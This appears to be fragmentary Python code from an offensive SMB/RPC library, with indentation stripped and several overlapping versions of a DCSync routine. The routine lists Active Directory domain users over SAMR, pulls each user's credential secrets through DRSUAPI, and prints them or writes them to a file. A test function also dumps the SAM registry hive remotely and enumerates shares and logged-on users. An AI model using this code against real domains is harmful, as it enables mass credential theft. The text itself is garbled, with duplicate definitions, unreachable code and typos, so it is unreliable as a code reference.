async def amain(url):
print(1)
conn_url = SMBConnectionURL(url)
print(2)
connection = conn_url.get_connection()
await connection.login()
print(3)
async with SMBMachine(connection) as computer:
async with SMBDRSUAPI(connection, 'TEST') as drsuapi:
try:
_, err = await drsuapi.connect()
_, err = await drsuapi.open()
if err is not None:
raise err
async for username, user_sid, err in computer.list_domain_users(
target_domain='TEST'):
#print(username)
x, err = await drsuapi.DRSCrackNames(name=username)
if err is not None:
raise err
#print(x.dump())
#await asyncio.sleep(0.01)
except Exception as e:
logging.exception('error!')
raise e
async def dcsync(self, target_domain=None, target_users=[]):
if target_domain is None:
logger.debug('No domain defined, fetching it from SAMR')
logger.debug('Fetching domains...')
async for domain in self.samr.list_domains():
if domain == 'Builtin':
continue
if target_domain is None: #using th first available
target_domain = domain
logger.debug('Domain available: %s' % domain)
async with SMBDRSUAPI(self.connection, target_domain) as drsuapi:
try:
await drsuapi.connect()
await drsuapi.open()
except Exception as e:
logger.exception('Failed to connect to DRSUAPI!')
raise e
logger.debug('Using domain: %s' % target_domain)
if len(target_users) > 0:
for username in target_users:
secrets = await drsuapi.get_user_secrets(username)
yield secrets
else:
domain_sid = await self.samr.get_domain_sid(target_domain)
domain_handle = await self.samr.open_domain(domain_sid)
async for username, user_sid in self.samr.list_domain_users(
domain_handle):
secrets = await drsuapi.get_user_secrets(username)
yield secrets
async def dcsync(self, target_domain=None, target_users=[]):
try:
if isinstance(target_users, str):
target_users = [target_users]
if self.samr is None:
await self.connect_rpc('SAMR')
if target_domain is None:
logger.debug('No domain defined, fetching it from SAMR')
logger.debug('Fetching domains...')
async for domain, err in self.samr.list_domains():
if err is not None:
raise err
if domain == 'Builtin':
continue
if target_domain is None: #using th first available
target_domain = domain
logger.debug('Domain available: %s' % domain)
async with SMBDRSUAPI(self.connection, target_domain) as drsuapi:
try:
_, err = await drsuapi.connect()
if err is not None:
raise err
_, err = await drsuapi.open()
if err is not None:
raise err
except Exception as e:
logger.exception('Failed to connect to DRSUAPI!')
raise e
logger.debug('Using domain: %s' % target_domain)
if len(target_users) > 0:
for username in target_users:
secrets, err = await drsuapi.get_user_secrets(username)
yield secrets, err
else:
domain_sid, _ = await self.samr.get_domain_sid(
target_domain)
domain_handle, _ = await self.samr.open_domain(domain_sid)
async for username, user_sid, err in self.samr.list_domain_users(
domain_handle):
if err is not None:
yield None, err
return
logger.debug('username: %s' % username)
secrets, err = await drsuapi.get_user_secrets(username)
if err is not None:
yield None, err
return
logger.debug('secrets: %s' % secrets)
yield secrets, None
except Exception as e:
yield None, e
return
async def filereader_test(connection_string, filename):
target = SMBTarget.from_connection_string(connection_string)
credential = SMBCredential.from_connection_string(connection_string)
spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)
async with SMBConnection(spneg, target) as connection:
await connection.login()
try:
t = SMBDRSUAPI(connection, 'TEST.corp')
await t.connect()
await t.open()
input('open succsess!')
await t.get_user_secrets('victim')
except Exception as e:
import traceback
traceback.print_exc()
print('Error! %s' % e)
return
tmpFileName = os.urandom(4).hex() + '.tmp'
rreg = SMBRemoteRegistryService(connection)
await rreg.save_hive('SAM', tmpFileName)
print('Success! Registry file should be in %s' %
('SYSTEM32\\' + tmpFileName))
await rreg.close()
return
rpctransport = SMBTransport(connection, filename=r'\srvsvc')
dce = rpctransport.get_dce_rpc()
await dce.connect()
await dce.bind(srvs.MSRPC_UUID_SRVS)
resp = await srvs.hNetrShareEnum(dce, 1)
print(resp['InfoStruct']['ShareInfo']['Level1']['Buffer'])
rpctransport = SMBTransport(connection, filename=r'\wkssvc')
dce = rpctransport.get_dce_rpc()
await dce.connect()
await dce.bind(wkst.MSRPC_UUID_WKST)
resp = await wkst.hNetrWkstaUserEnum(dce, 1)
print(resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer'])
rpctransport = SMBTransport(connection, filename=r'\wkssvc')
dce = rpctransport.get_dce_rpc()
await dce.connect()
await dce.bind(wkst.MSRPC_UUID_WKST)
resp = await wkst.hNetrWkstaUserEnum(dce, 1)
print(resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer'])
async def dcsync(connection_string,
filename=None,
target_domain=None,
target_users=[],
json_out=False):
target = SMBTarget.from_connection_string(connection_string)
credential = SMBCredential.from_connection_string(connection_string)
spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)
async with SMBConnection(spneg, target) as connection:
await connection.login()
async with SMBSAMR(connection) as samr:
logging.debug('Connecting to SAMR')
try:
await samr.connect()
except Exception as e:
loggign.exception('Failed to connect to SAMR')
if target_domain is None:
logging.debug('No domain defined, fetching it from SAMR')
logging.debug('Fetching domains...')
async for domain in samr.list_domains():
if target_domain is None: #using th first available
target_domain = domain
logging.debug('Domain available: %s' % domain)
logging.debug('Using domain: %s' % target_domain)
async with SMBDRSUAPI(connection, target_domain) as drsuapi:
try:
await drsuapi.connect()
await drsuapi.open()
except:
logging.exception('Failed to connect to DRSUAPI!')
if len(target_users) > 0:
if filename is not None:
with open(filename, 'w') as f:
for username in target_users:
secrets = await drsuapi.get_user_secrets(
username)
if json_out == True:
f.write(json.dumps(secrets.to_dict()))
else:
f.write(str(secrets))
else:
for username in target_users:
secrets = await drsuapi.get_user_secrets(username)
print(str(secrets))
else:
domain_sid = await samr.get_domain_sid(target_domain)
domain_handle = await samr.open_domain(domain_sid)
if filename is not None:
with open(filename, 'w') as f:
async for username, user_sid in samr.list_domain_users(
domain_handle):
secrets = await drsuapi.get_user_secrets(
username)
if json_out == True:
f.write(
json.dumps(secrets.to_dict()) + '\r\n')
else:
f.write(str(secrets))
else:
async for username, user_sid in samr.list_domain_users(
domain_handle):
secrets = await drsuapi.get_user_secrets(username)
print(str(secrets))
print('Done!')